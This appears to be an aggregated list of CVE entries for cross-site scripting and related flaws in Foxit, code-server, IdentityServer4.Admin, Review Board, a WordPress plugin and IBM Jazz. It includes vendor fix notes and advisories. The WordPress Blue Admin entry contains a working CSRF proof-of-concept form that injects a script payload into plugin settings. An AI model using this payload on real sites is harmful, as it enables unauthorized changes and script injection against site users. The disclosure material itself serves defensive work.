Foxit PDF Reader and PDF Editor before 11.2.2 have a Type Confusion issue that causes a crash because of Unsigned32 mishandling during JavaScript execution.

CVE-2022-30557: Security Bulletins | Foxit Software

Shopwind <=v3.4.2 was discovered to contain a stored cross-site scripting (XSS) vulnerability.

CVE-2022-30057

Cross-site scripting (XSS) vulnerability exists in Coder Code-Server before 3.12.0, allows attackers to execute arbitrary code via crafted URL.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-42648: Cross Site Scripting（XSS）vulnerability in code-server · Issue #4355 · coder/code-server

A cross-site scripting (XSS) vulnerability in Skoruba IdentityServer4.Admin before 2.0.0 via unencoded value passed to the data-secret-value parameter.

In the views ClientSecret and ApiResourceSecret is not HTML encoded data attribute data-secret-value on the button:

    <td><button class="secret-value-button btn btn-outline-primary" data-secret-value="clientSecret.Value"><i class="fa fa-eye"></i></button></td>
    

This data attribute is used in the dialog with secret detail.

    <button class="secret-value-button btn btn-outline-primary" data-secret-value="@Html.Encode(clientSecret.Value)"><i class="fa fa-eye"></i></button>
    

I will send this fix asap.

Thanks to Silton Santos for reporting.

CVE-2021-28290: XSS issue in Client Secrets and Api Resource Secrets · Issue #813 · skoruba/IdentityServer4.Admin

A Cross-Site Scripting (XSS) vulnerability exists within Review Board versions 3.0.20 and 4.0 RC1 and earlier. An authenticated attacker may inject malicious Javascript code when using Markdown editing within the application which remains persistent.

**Review Board 4.0 RC 2 Release Notes¶**

**Release date**: April 14, 2021

Please see the 4.0 beta 1, 4.0 beta 2, and 4.0 RC 1 release notes for general information and upgrade notes.

These release notes show changes since RC 1.

**Installation¶**

To install this release, run the following:

$ sudo pip install \\
    --trusted-host downloads.reviewboard.org \\
    -f http://downloads.reviewboard.org/releases/ReviewBoard/4.0/ \\
    -f http://downloads.reviewboard.org/releases/rbintegrations/2.0/ \\
    --pre -U ReviewBoard

Or:

$ sudo easy\_install \\
    -f http://downloads.reviewboard.org/releases/ReviewBoard/4.0/ \\
    -f http://downloads.reviewboard.org/releases/rbintegrations/2.0/ \\
    -U ReviewBoard

Note

If this is a new install on Python 2.7, please use **pip**, as support for **easy\_install** is going away.

**pip** is required for Python 3.

Warning

We **do not** recommend upgrading a production server with this version of Review Board. It’s best to install on a test server, with a copy of your production database, in case there are any major problems.

**Packaging¶**

*   bcrypt is capped to < 3.2 on Python 2.7.
    
*   pyparsing is capped to 2.4.x on Python 2.7.
    

**Security Fixes¶**

This release fixes a XSS vulnerability in Markdown rendering, which could allow an attacker to craft a link that executes arbitrary JavaScript code when clicked.

The attacker would need to be someone who already has legitimate access to your server, and can perform reviews or otherwise access your code.

We recommend that everyone (especially those running public servers) upgrades to address this vulnerability, though the seriousness of the issue will vary from company to company.

Thanks to Matt S. for the security report.

**Removed Features¶**

*   Removed the old **dumpdb** and **loaddb** management commands.
    
    These weren’t compatible with the version of Django used for Review Board 4.0, and were often misused. We recommend that people use their database’s own SQL dump/load tools to move databases.
    
    We’re working on a tool for obtaining structured dumps of the database and performing database imports, merges, and moving between different types of databases. This will be available as a free feature in Power Pack.
    

**Bug Fixes¶**

**Reviews¶**

*   Fixed an invisible Publish Review button at the top of a review request page.
    
    This could be accidentally clicked, creating empty reviews.
    
*   The styling for inline code literals (text surrounded by backticks) in Markdown text fields now looks the same whether editing or viewing text.
    
    This has been a long-standing issue since the introduction of Markdown support. We’ve finally made this consistent.
    

**Search¶**

*   Issues communicating with the search backend will no longer cause pages or the API to crash.
    

**Contributors¶**

*   Christian Hammond
    
*   Matt S

CVE-2021-31330: Review Board 4.0 RC 2 Release Notes

WordPress Blue Admin plugin version 21.06.01 suffers from a cross site request forgery vulnerability.

    Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)Date: 2021-07-27Exploit Author : Abisheik M Vendor Homepage : https://wpscan.com/plugin/blue-admiVersion : <= 21.06.01Tested on: windows 10 ProfessionalCVE : CVE-2021-24581<html>  <body>    <form action="http://example.com/wp-admin/admin.php?page=blue-admin&tab=blue_admin_login_page" method="POST" enctype="multipart/form-data">      <input type="hidden" name="ba_lp_attr[fm_bg_color]" value="FFFFFF" />      <input type="hidden" name="ba_lp_attr[fm_color]" value="777777" />      <input type="hidden" name="ba_lp_attr[logo_text]" value='WP"><script>alert(/XSS/)</script>' />      <input type="hidden" name="ba_lp_attr[logo_url]" value="https://example.com" />      <input type="hidden" name="ba_lp_attr[logo_img]" value="" />      <input type="hidden" name="ba_lp_attr[bg_color]" value="EEEEEE" />      <input type="hidden" name="ba_lp_attr[text_color]" value="222222" />      <input type="hidden" name="ba_lp_attr[bg_img]" value="" />      <input type="hidden" name="ba_lp_attr[bg_img_pos]" value="" />      <input type="hidden" name="ba_lp_attr[bg_img_rep]" value="" />      <input type="hidden" name="ba_lp_options_save" value="Save changes" />      <input type="submit" value="Submit request" />    </form>  </body></html>

WordPress Blue Admin 21.06.01 Cross Site Request Forgery

IBM Jazz Foundation (IBM Jazz Team Server 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 214619.

  

**Summary**

Summary guidance: - The Jazz Team Server is vulnerable to cross-site scripting.

**Vulnerability Details**

**CVEID:**   CVE-2021-39059  
**DESCRIPTION:**   IBM Jazz Foundation is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/214619 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)

**Affected Products and Versions**

**Affected Products/Versions guidance:**

**Affected Product(s)**

**Version(s)  
**

Jazz Team Server

6.0.6, 6.0.6.1, 7.0, 7.0.1, 7.0.2

  

**Remediation/Fixes**

**Remediation/Fixes guidance**:

**IBM strongly recommends addressing the vulnerability now.**

**Product(s)**

**Version(s) number and/or range** 

**Remediation/Fix/Instructions**

Jazz Team Server 

6.0.6

Download and install iFix026 or later

Jazz Team Server 

6.0.6.1

Download and install iFix025 or later

Jazz Team Server 

7.0

Download and install iFix015 or later

Jazz Team Server 

7.0.1

Download and install iFix017 or later

Jazz Team Server 

7.0.2

Download and install iFix013 or later

**Workarounds and Mitigations**

**Workarounds/Mitigation guidance**:

None

**References**

Off

**Acknowledgement**

The vulnerability was reported to IBM by basil\_jawan

**Change History**

09 May 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSPRJQ","label":"IBM Engineering Lifecycle Management Base"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF016","label":"Linux"}\],"Version":"6.0.6, 6.0.6.1, 7.0, 7.0.1, 7.0.2","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}}\]

Tag

#xss